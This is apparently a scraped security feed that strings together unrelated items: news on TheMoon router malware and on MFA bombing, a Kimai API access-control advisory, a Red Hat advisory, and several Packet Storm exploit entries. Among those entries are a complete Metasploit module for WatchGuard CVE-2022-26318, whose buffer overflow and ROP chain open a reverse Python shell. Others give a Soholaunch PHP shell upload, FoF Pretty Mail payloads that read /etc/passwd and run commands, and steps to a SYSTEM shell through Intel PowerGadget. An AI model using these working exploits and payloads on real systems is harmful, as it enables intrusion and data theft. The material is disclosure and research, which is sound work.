By Waqas
A new variant of "TheMoon Malware" has emerged, specifically targeting vulnerable IoT devices, particularly Asus routers.
This is a post from HackRead.com Read the original post: TheMoon Malware Returns: 6,000 Asus Routers Hacked in 72 Hours

Is your router outdated? Millions are at risk as a new variant of TheMoon malware infects devices in just 72 hours. Learn how to protect yourself from this cyberattack and secure your home network.

A multi-year campaign targeting vulnerable home and small business routers has come to light thanks to a recent report by Black Lotus Labs, a security research team at Lumen Technologies. The campaign leverages an updated version of a well-known malware strain called “TheMoon.”

TheMoon malware first emerged in 2014 and has a history of exploiting weaknesses in routers and Internet of Things (IoT) devices. This latest campaign, however, appears to be particularly widespread, infecting devices across 88 countries.

According to the Black Lotus Labs report, the attackers primarily focused on end-of-life (EoL) routers, meaning devices no longer receive security updates from the manufacturer. ASUS routers were the most targeted, with over 6,000 infected in just 72 hours in early March 2024.

The attackers’ goal appears to be the creation of a large network of compromised devices. By infecting routers and IoT devices, they can add them to a service known as “Faceless.” Faceless operates as a proxy service, allowing malicious actors to anonymize their online activities. This anonymization can make it difficult to track the source of cyberattacks and other criminal operations.

Jason Soroko, Senior Vice President of Product at Sectigo told Hackread.com that, _“_Routers and other networking equipment that use passwords have been easy victims to pray and spray attacks for years._“_

_“_Unfortunately, stronger forms of authentication are not common. What’s new here is the usage of proxy networks for C2 traffic obfuscation. It shows that de-anonymizing Tor and VPN traffic is not only happening but has been successfully used against attackers,_“_ Jason added.

To protect your devices from the latest variant of TheMoon malware or similar attacks; always follow these steps:

*   **Update your router and IoT devices regularly.** Check the manufacturer’s website for instructions on how to update the firmware for your specific device.
*   **Disable remote access to your router.** This can be done through the router’s administration panel.
*   **Use strong passwords for your router and Wi-Fi network.** Avoid using easily guessable passwords or default settings.
*   **Consider a security solution for your home network.** There are several security products available that can help to protect your network from malicious activities.

There are many more technical details and aspects addressed in the Black Lotus Labs blog post.

1.  How To Keep Your Router And WiFi Safe From Hackers
2.  DDoS Botnet ‘Condi’ Targets Vulnerable TP-Link AX21 Routers
3.  Russian Hackers Target Ubiquiti Routers for Data, Botnet Creation
4.  D-Link home routers plagued with critical & multiple vulnerabilities
5.  415,000 routers infected by crypto malware – Prime target MikroTik

TheMoon Malware Returns: 6,000 Asus Routers Hacked in 72 Hours

### Summary
The permission `view_other_timesheet` performs differently for the Kimai UI and the API, thus returning unexpected data through the API.

### Details
When setting the `view_other_timesheet` permission to true, on the frontend, users can only see timesheet entries for teams they are a part of. When requesting all timesheets from the API, however, all timesheet entries are returned, regardless of whether the user shares team permissions or not.

Example:
There are projects P1 and P2, Teams T1 and T2, users U1 and U2 and Timesheet entries E1 and E2. U1 is team leader of team T1 and has access to P1. U2 is in Team T2 and has access to both P1 and P2. U2 creates E1 for P1 and E2 for P2.
In the UI, U1 with `view _other_timesheet` perms sees E1 as he is a part of T1 that has access to P1.
In the API, however, he has access to E1 **and E2**.

Additionally, if U1 is not a team leader T1, he does not see any timesheet from a user other than himself in the UI, but still all timesheets in the API.

### PoC
- Give a user `view_other_timesheet` permission
- The result of the UI and the API call to `/api/timesheets?user=all` differs in the data that is being returned

Curl command:
```bash
curl -X 'GET' \
  'https://kimai.instance.com/api/timesheets?user=all' \
  -H 'accept: application/json' \
  -H 'X-AUTH-USER: username' \
  -H 'X-AUTH-TOKEN: api_token'
 ```

### Impact
This is at least an insufficient granularity of access control weakness. People can see timesheet entries they are not supposed to.
This greatly affects the confidentiality of timesheet entries. 

Restricting API access to administrators is also not a valid solution, as API access is needed, for example, to use the mobile app.


**Summary**

The permission view_other_timesheet performs differently for the Kimai UI and the API, thus returning unexpected data through the API.

**Details**

When setting the view_other_timesheet permission to true, on the frontend, users can only see timesheet entries for teams they are a part of. When requesting all timesheets from the API, however, all timesheet entries are returned, regardless of whether the user shares team permissions or not.

Example:  
There are projects P1 and P2, Teams T1 and T2, users U1 and U2 and Timesheet entries E1 and E2. U1 is team leader of team T1 and has access to P1. U2 is in Team T2 and has access to both P1 and P2. U2 creates E1 for P1 and E2 for P2.  
In the UI, U1 with view _other_timesheet perms sees E1 as he is a part of T1 that has access to P1.  
In the API, however, he has access to E1 **and E2**.

Additionally, if U1 is not a team leader T1, he does not see any timesheet from a user other than himself in the UI, but still all timesheets in the API.

**PoC**

*   Give a user view_other_timesheet permission
*   The result of the UI and the API call to /api/timesheets?user=all differs in the data that is being returned

Curl command:

curl -X 'GET' \\
  'https://kimai.instance.com/api/timesheets?user=all' \\
  -H 'accept: application/json' \\
  -H 'X-AUTH-USER: username' \\
  -H 'X-AUTH-TOKEN: api\_token'

**Impact**

This is at least an insufficient granularity of access control weakness. People can see timesheet entries they are not supposed to.  
This greatly affects the confidentiality of timesheet entries.

Restricting API access to administrators is also not a valid solution, as API access is needed, for example, to use the mobile app.

**References**

*   GHSA-cj3c-5xpm-cx94
*   https://nvd.nist.gov/vuln/detail/CVE-2024-29200
*   https://github.com/kimai/kimai/releases/tag/2.13.0

GHSA-cj3c-5xpm-cx94: Kimai API returns timesheet entries a user should not be authorized to view

This Metasploit module exploits a buffer overflow at the administration interface (8080 or 4117) of WatchGuard Firebox and XTM appliances which is built from a cherrypy python backend sending XML-RPC requests to a C binary called wgagent using pre-authentication endpoint /agent/login. This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x before 12.5.9_U2. Successful exploitation results in remote code execution as user nobody.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'zlib'class MetasploitModule < Msf::Exploit::Remote  Rank = GoodRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'WatchGuard XTM Firebox Unauthenticated Remote Command Execution',        'Description' => %q{          This module exploits a buffer overflow at the administration interface (8080 or 4117) of WatchGuard Firebox          and XTM appliances which is built from a cherrypy python backend sending XML-RPC requests to a C binary          called wgagent using pre-authentication endpoint /agent/login.          This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x          before 12.5.9_U2. Successful exploitation results in remote code execution as user nobody.        },        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module          'Charles Fol (Ambionics Security)', # discovery          'Dylan Pindur (AssetNote)', # reverse engineering of CVE-2022-26318'          'Misterxid' # POC        ],        'References' => [          [ 'CVE', '2022-26318' ],          [ 'URL', 'https://www.ambionics.io/blog/hacking-watchguard-firewalls' ],          [ 'URL', 'https://www.assetnote.io/resources/research/diving-deeper-into-watchguard-pre-auth-rce-cve-2022-26318' ],          [ 'URL', 'https://github.com/misterxid/watchguard_cve-2022-26318' ],          [ 'URL', 'https://attackerkb.com/topics/t8Nrnu99ZE/cve-2022-26318' ]        ],        'License' => MSF_LICENSE,        'Platform' => [ 'unix' ],        'Privileged' => false,        'Arch' => [ ARCH_CMD ],        'Targets' => [          [            'Automatic (Reverse Python Interactive Shell)',            {              'Platform' => [ 'unix' ],              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_python',                'SHELL' => '/usr/bin/python'              }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2022-08-29',        'DefaultOptions' => {          'SSL' => true,          'RPORT' => 8080        },        'Notes' => {          'Stability' => [ SERVICE_RESOURCE_LOSS ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ]        }      )    )    register_options(      [        OptString.new('TARGETURI', [ true, 'WatchGuard Firebox base url', '/' ])      ]    )  end  def check_watchguard_firebox?    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'auth', 'login'),      'vars_get' => {        'from_page' => '/'      }    })    return true if res && res.code == 200 && res.body.include?('Powered by WatchGuard Technologies') && res.body.include?('Firebox')    false  end  def create_bof_payload    # temporary filename in /tmp where python payload will be stored.    @py_fname = "/tmp/#{Rex::Text.rand_text_alphanumeric(4)}.py"    # xml overflow payload    payload = '<methodCall><methodName>agent.login</methodName><params><param><value><struct><member><value><'.encode    payload << ('A' * 3181).encode    payload << 'MFA>'.encode    payload << ('<BBBBMFA>' * 3680).encode    # padding and rop chain    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 P@\x00\x00"    payload << "\x00\x00\x00h\xf9@\x00\x00\x00\x00\x00 P@\x00\x00\x00\x00\x00\x00\x00\x0e\xd6A\x00\x00\x00\x00\x00\xb1\xd5A"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00}^@\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00|^@\x00\x00\x00\x00\x00\xad\xd2A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x0e\xd6A\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00*\xa9@\x00\x00\x00\x00\x00H\x8d=\x9d\x00\x00\x00\xbeA\x02\x00\x00\xba\xb6"    payload << "\x01\x00\x00\xb8\x02\x00\x00\x00\x0f\x05H\x89\x05\x92\x00\x00\x00H\x8b\x15\x93\x00\x00\x00H\x8d5\x94\x00"    payload << "\x00\x00H\x8b=}\x00\x00\x00\xb8\x01\x00\x00\x00\x0f\x05H\x8b=o\x00\x00\x00\xb8\x03\x00\x00\x00\x0f\x05\xb8;"    payload << "\x00\x00\x00H\x8d=?\x00\x00\x00H\x89= \x00\x00\x00H\x8d5A\x00\x00\x00H\x895\x1a\x00\x00\x00H\x8d5\x0b\x00"    payload << "\x00\x001\xd2\x0f\x05\xb8<\x00\x00\x00\x0f\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00#{datastore['SHELL']}\x00#{@py_fname}\x00\x00\x00\x00\x00\x00\x00\x00\x00\xef"    payload << "\x01\x00\x00\x00\x00\x00\x00"    # shell code to launch an reverse interactive python shell    # The Watchguard appliance has a very restricted linux command set, readonly root filesystem and no unix shells installed    # The interactive Python shell (-i) is for now the only way to get shell access    payload << 'import socket;from subprocess import call; from os import dup2;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'.encode    payload << "s.connect((\"#{datastore['LHOST']}\",#{datastore['LPORT']})); dup2(s.fileno(),0); dup2(s.fileno(),1); dup2(s.fileno(),2);".encode    payload << "call([\"#{datastore['SHELL']}\",\"-i\"]);".encode    payload << "import os; os.remove(\"#{@py_fname}\");".encode    return Zlib.gzip(payload)  end  def check    print_status("Checking if #{peer} can be exploited.")    return CheckCode::Detected if check_watchguard_firebox?    CheckCode::Safe  end  def exploit    print_status("#{peer} - Attempting to exploit...")    bof_payload = create_bof_payload    print_status("#{peer} - Sending payload...")    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'agent', 'login'),      'headers' => {        'Accept-Encoding' => 'gzip, deflate',        'Content-Encoding' => 'gzip'      },      'data' => bof_payload    })  endend

WatchGuard XTM Firebox Unauthenticated Remote Command Execution

Soholaunch version 4.9.4 r44 suffers from a remote shell upload vulnerability.

    ## Exploit Title: Soholaunch Version : v4.9.4 r44 Remote Code Execution### Date: 2024-3-29### Exploit Author: tmrswrr### Category: Webapps### Vendor Homepage: https://livesite.com/### Version : v4.9.4 r441 ) Login with admin cred click Main Menu > File Manager > Upload New Files > Uploading test.php file Payload : <?php echo system('id); ?>2 ) After click File Manager > Images > test.php : https://127.0.0.1/Soholaunch/images/test.phpResult: uid=1000(soho) gid=1000(soho) groups=1000(soho) uid=1000(soho) gid=1000(soho) groups=1000(soho)

Soholaunch 4.9.4 r44 Shell Upload

The FoF Pretty Mail extension version 1.1.2 for Flarum suffers from a local file inclusion vulnerability.

    Exploit Title: FoF Pretty Mail 1.1.2 Extension for Flarum Local FileInclusion (LFI)Date: 03/28/2024Exploit Author: Chokri HammediVendor Homepage: https://flarum.org/Software Link: https://github.com/FriendsOfFlarum/pretty-mailVersion: 1.1.2Tested on: Windows XPCVE: N/ADescription:The FoF Pretty Mail extension for Flarum is vulnerable to Local FileInclusion (LFI) due to the unsafe handling of file paths in the emailtemplate. An attacker with administrative access can exploit thisvulnerability to include sensitive files from the server's file system inthe email content, potentially leading to information disclosure.Steps to Reproduce:Log in as an administrator on the Flarum forum.Navigate to the FoF Pretty Mail extension settings.Edit the email default template and insert the following payload at the endof the template:{{ include('/etc/passwd') }}Save the changes to the email template.Trigger any action that sends an email, such as user registration orpassword reset.The recipient of the email will see the contents of the included file (inthis case, /etc/passwd) in the email content.

FoF Pretty Mail 1.1.2 Local File Inclusion

The FoF Pretty Mail extension version 1.1.2 for Flarum suffers from a server-side template injection vulnerability.

    Exploit Title: FoF Pretty Mail 1.1.2 Extension for Flarum Server-SideTemplate Injection (SSTI)Date: 03/28/2024Exploit Author: Chokri HammediVendor Homepage: https://flarum.org/Software Link: https://github.com/FriendsOfFlarum/pretty-mailVersion: 1.1.2Tested on: Windows XPCVE: N/ADescription:The FoF Pretty Mail extension for Flarum is vulnerable to Server-SideTemplate Injection (SSTI) due to the unsafe handling of template variables.An attacker with administrative access can inject malicious code into theemail template, leading to arbitrary code execution on the server.Steps to Reproduce:Log in as an administrator on the Flarum forum.Navigate to the FoF Pretty Mail extension settings.Edit the email default template and insert the following payload:{{ 7*7 }}{{ system('id') }}{{ system('echo "Take The Rose"') }}Save the changes to the email template.Trigger any action that sends an email, such as user registration orpassword reset.The recipient of the email will see the result of the injected expressions(e.g., "49" for {{ 7*7 }}, the output of the id command for {{ system('id')}}, and the output of the echo "Take The Rose" command for {{ system('echo"Take The Rose"') }}) in the email content.

FoF Pretty Mail 1.1.2 Server-Side Template Injection

The FoF Pretty Mail extension version 1.1.2 for Flarum suffers from a command injection vulnerability.

    Exploit Title: FoF Pretty Mail 1.1.2 Extension for Flarum Command InjectionDate: 03/28/2024Exploit Author: Chokri HammediVendor Homepage: https://flarum.org/Software Link: https://github.com/FriendsOfFlarum/pretty-mailVersion: 1.1.2Tested on: Windows XPCVE: N/ADescription:The FoF Pretty Mail extension for Flarum is vulnerable to Command Injectiondue to the unsafe handling of user input in the email template. An attackerwith administrative access can inject PHP code into the email template,leading to arbitrary command execution on the server.Steps to Reproduce:Log in as an administrator on the Flarum forum.Navigate to the FoF Pretty Mail extension settings.Edit the email default template and insert one of the following payloads atthe end of the template:<?php system('echo "Take The Rose"; id'); ?>or<?php system('echo "Take The Rose"; cat /etc/passwd'); ?>Save the changes to the email template.Trigger any action that sends an email, such as user registration orpassword reset.The recipient of the email will see the message "Take The Rose" followed bythe output of the injected command (id or cat /etc/passwd) in the emailcontent.

FoF Pretty Mail 1.1.2 Command Injection

Intel PowerGadget version 3.6 suffers from a local privilege escalation vulnerability.

    Vulnerability summary: Local Privilege Escalation from regular user to SYSTEM, via conhost.exe hijacking triggered by MSI installer in repair modeAffected Products: Intel PowerGadgetAffected Versions: tested on PowerGadget_3.6.msi (a3834b2559c18e6797ba945d685bf174), file signed on ‎Monday, ‎February ‎1, ‎2021 9:43:20 PM (this seems to be the latest version), earlier versions might be affected as well.Affected Platforms: WindowsCommon Vulnerability Scoring System (CVSS) Base Score (CVSSv3): 7.8 HIGHRisk score (CVSSv3): 7.8 HIGH AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H&version=3.1)I have reported this issue to Intel, but since the product has been marked End of Life since October 2023, it is not going to receive a security update nor a security advisory. Intel said that they are OK with me making this finding public, under the condition that I would emphasize that the product is EOL.Description and steps to replicate:On systems where Intel PowerGadget is installed from an MSI package, a local interactive regular user is able to run the MSI installer file in the "repair" mode and hijack the conhost.exe process (which is created by an instance of sc.exe the installer calls during the process) by quickly left-clicking on the console window that pops up for a split second in the late stage of the process. Left-clicking on the conhost.exe console window area freezes the console (meaning it prevents the sc.exe process from exiting). That process is running as NT AUTHORITY/SYSTEM. From there, it is possible to run a web browser by clicking on one of the links in the small GUI window that can be called by right-clicking on the console window bar and entering "properties". Once a web browser is spawn, attacker can call up the "Open" dialog and in that way get a fully working escape to explorer. From there they can, for example, browse through C:\Windows\System32 and right-click on cmd.exe and run it, obtaining as SYSTEM shell.Now - an important detail - on most recent builds of Windows neither Edge nor Internet Explorer will spawn as SYSTEM (this is a mitigation from Microsoft); thus for successful exploitation another browser has to already be present in the system. As you can see I pick Chrome and then spawn an instance of cmd.exe, which turns out to be running as SYSTEM. Also, when doing this, DO NOT check "always use this app" in that dialog, as if you pick the wrong one (e.g. Edge or IE), it will be saved as the default http/https handler for SYSTEM and from then further attacks like this won't work if you want to repeat the POC - unless you reverse that change somewhere in the registry.This class of Local Privilege Escalations is described by Mandiant in this article: https://www.mandiant.com/resources/blog/privileges-third-party-windows-installers.To run the installer in repair mode, one needs to identify the proper MSI file. After normal installation, it is by default present in C:\Windows\Installer directory, under a random name. The proper file can be identified by attributes like control sum, size or "author" information.The exploitation process is illustrated in the screenshots below, reflecting the the steps taken to attain a SYSTEM shell (no exploit development is required, the issue can be exploited using GUI).Recommendation:Technically, as per the reference, it is recommended to change the way the sc.exe is called, using the WixQuietExec() method (see the second reference). In such case the conhost.exe window will not be visible to the user, thus making it impossible to perform any GUI interaction and an escape.I am, however, aware that this product is no longer maintained since October 2023 (https://www.intel.com/content/www/us/en/developer/articles/tool/power-gadget.html) and that includes security updates. Still, I believe a security advisory and CVE should be released just to make users and administrators aware why they need to replace PowerGadget with Intel Performance Counter Monitor.Another possible (short-term) mitigation is to disable MSI (https://learn.microsoft.com/en-us/windows/win32/msi/disablemsi).References:https://hackingiscool.pl/intel-powergadget-3-6-local-privilege-escalation/https://www.mandiant.com/resources/blog/privileges-third-party-windows-installershttps://wixtoolset.org/docs/v3/customactions/qtexec/https://www.intel.com/content/www/us/en/developer/articles/tool/power-gadget.html)https://learn.microsoft.com/en-us/windows/win32/msi/disablemsi

Intel PowerGadget 3.6 Local Privilege Escalation

Red Hat Security Advisory 2024-1570-03 - Updated images are now available for Red Hat Advanced Cluster Security. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1570.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: ACS 4.4 enhancement and security update  
Advisory ID:        RHSA-2024:1570-03  
Product:            Red Hat Advanced Cluster Security for Kubernetes  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1570  
Issue date:         2024-03-29  
Revision:           03  
CVE Names:          CVE-2019-25210  
====================================================================

Summary: 

Important: Updated images are now available for Red Hat Advanced Cluster Security.

Description:

Updated images are now available for Red Hat Advanced Cluster Security. The  
updated image includes new features and bug fixes.

This release includes the following features and updates:

* New Compliance capabilities (Technology Preview)  
* Network graph enhancements for internal entities  
* Build-time network policy tools is now generally available  
* Init-bundle graphical user interface improvements  
* eBPF CO-RE collection method enabled by default  
* Bring your own database for RHACS Central is now generally available  
* Support RHACS on ROSA hosted control plane  
* Life cycle updates  
* Integration with Red Hat OpenShift Cluster Manager and Paladin Cloud to discover unsecured clusters  
* Migration to stock Red Hat OpenShift SCCs during manual upgrade by using roxctl CLI  
* Cluster discovery by using cloud source integrations  
* Short-lived API tokens for Central  
* Enhanced roxctl deployment check command  
* Authentication of AWS and GCP integrations by using short-lived tokens (Technology Preview)  
* Scanner V4 that uses upstream ClairCore (Technology Preview)  
* Filter workload CVEs by using component and component source

For more information, including bug fix descriptions, see https://docs.openshift.com/acs/4.4/release_notes/44-release-notes.html.

Security fixes:  
* golang: net/http: insufficient sanitization of Host header (CVE-2023-29406)  
* go-git: Maliciously crafted Git server replies can cause DoS on go-git clients (CVE-2023-49568)  
* helm: Missing YAML content leads to panic (CVE-2024-26147)  
* helm: Shows secrets with --dry-run option in clear text (CVE-2019-25210)

Solution:

CVEs:

CVE-2019-25210

References:

https://docs.openshift.com/acs/4.4/release_notes/44-release-notes.html  
https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2222167  
https://bugzilla.redhat.com/show_bug.cgi?id=2258165  
https://bugzilla.redhat.com/show_bug.cgi?id=2265440  
https://issues.redhat.com/browse/ROX-23399

Red Hat Security Advisory 2024-1570-03

Cybercriminals have taken MFA bombing to the next level by calling victims of an attack from a spoofed Apple Support number.

Simply put, MFA bombing (also known as “push bombing” or “MFA fatigue”) is a brute force attack on your patience. Cybercriminals use MFA bombing to break into accounts that are protected by multi-factor authentication (MFA).

MFA normally requires a user to enter a six-digit code sent by SMS, or generated by an app, or to respond to a push notification, when they enter a username and password. It provides an enormous increase in security and makes life much harder for criminals.

Because it’s so hard to break, criminals have taken to getting users to defeat their own MFA. They do this by using stolen credentials to try logging in, or by trying to reset a user’s password over and over again. In both cases this bombards the user with push notifications asking them to approve the login, or messages asking them to change their password. By doing this, the criminals hope that users will either tap the wrong option or get so fed up they just do whatever the messages are asking them to do, just to make the bombardment stop.

Now, according to this blog by Bran Krebs, these attacks have evolved. If you can withstand the pressure of the constant notifications, the criminals will call you pretending to come to your rescue.

In one example Krebs writes about, criminals flooded a target’s phone with password reset notifications for their Apple ID. Each notification required the user to choose either “Allow” or “Don’t Allow” before they could go back to using their device.

After withstanding the temptation to click “Allow”, and declining “100-plus” notifications, the victim receved a call from a spoofed number pretending to be Apple Support.

The call was designed to get the victim to trigger a password reset, and then to hand over the one-time password reset code sent to their device. Armed with a reset code, the criminals could change the victim’s password and lock them out of their account.

Luckily, in this situation the victim thought the callers seemed untrustworthy, so he asked them to provide some of his personal information, and they got his name wrong.

Another victim of MFA bombing learned that the notifications kept coming even after he bought a new device and created a new Apple iCloud account. This revealed that the attacks must have been targeted at his telephone number, because it was the only constant factor between the two device configurations.

Yet another target was told by Apple that setting up an Apple Recovery Key for his account would stop the notifications once and for all, although both Krebs and the victim dispute this.

Unfortunately, there doesn’t seem to be a lot you can do once an MFA bombing attack starts other than be patient, and be careful not to click Allow. If you get a call, know that Apple Support will never call you out of the blue, so don’t trust the caller, no matter how convenient their timing.

If you lose control of your Apple ID, go to iforgot.apple.com to start the account recovery process.

**We don’t just report on phone security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

Tag

#auth